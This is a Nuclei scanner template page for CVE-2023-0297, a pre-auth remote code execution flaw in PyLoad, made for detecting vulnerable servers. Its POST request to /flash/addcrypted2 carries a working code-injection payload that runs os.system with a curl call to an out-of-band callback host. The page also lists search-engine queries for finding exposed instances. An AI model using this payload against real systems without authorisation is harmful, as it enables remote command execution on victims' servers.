Skip to content
Nuclei Templates

PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)

ID: CVE-2023-0297

Severity: critical

Author: MrHarshvardhan,DhiyaneshDk

Tags: cve,cve2023,huntr,packetstorm,rce,pyload,oast

Description

Section titled “Description”

Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.

YAML Source

Section titled “YAML Source”
id: CVE-2023-0297


info:
  name: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
  author: MrHarshvardhan,DhiyaneshDk
  severity: critical
  description: |
    Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the target system.
  remediation: |
    Upgrade PyLoad to a version that is not affected by this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/51532
    - https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1058
    - http://packetstormsecurity.com/files/171096/pyLoad-js2py-Python-Execution.html
    - http://packetstormsecurity.com/files/172914/PyLoad-0.5.0-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-0297
    cwe-id: CWE-94
    epss-score: 0.50964
    epss-percentile: 0.97545
    cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: pyload
    product: pyload
    shodan-query:
      - html:"pyload"
      - http.title:"login - pyload"
      - http.html:"pyload"
      - http.title:"pyload"
    fofa-query:
      - title="login - pyload"
      - body="pyload"
      - title="pyload"
    google-query:
      - intitle:"login - pyload"
      - intitle:"pyload"
    zoomeye-query: app="pyLoad"
  tags: cve,cve2023,huntr,packetstorm,rce,pyload,oast
variables:
  cmd: "curl {{interactsh-url}}"


http:
  - raw:
      - |
        GET /flash/addcrypted2 HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /flash/addcrypted2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        jk=pyimport+os%3Bos.system%28%22{{cmd}}%22%29%3Bf%3Dfunction+f2%28%29%7B%7D%3B&packages=YyVIbzmZ&crypted=ZbIlxWYe&passwords=oJFFUtTw


    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - 'JDownloader'


      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4a0a00473045022100ab9438231de722cb151967fb0f3efb75922ad710197ce1d7785485eec30ef7a502201ecbd69f76a800e22db3bfe20b627d359cfccf0abf11bcd85b7c3f7c71828bef:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-0297.yaml"

View on Github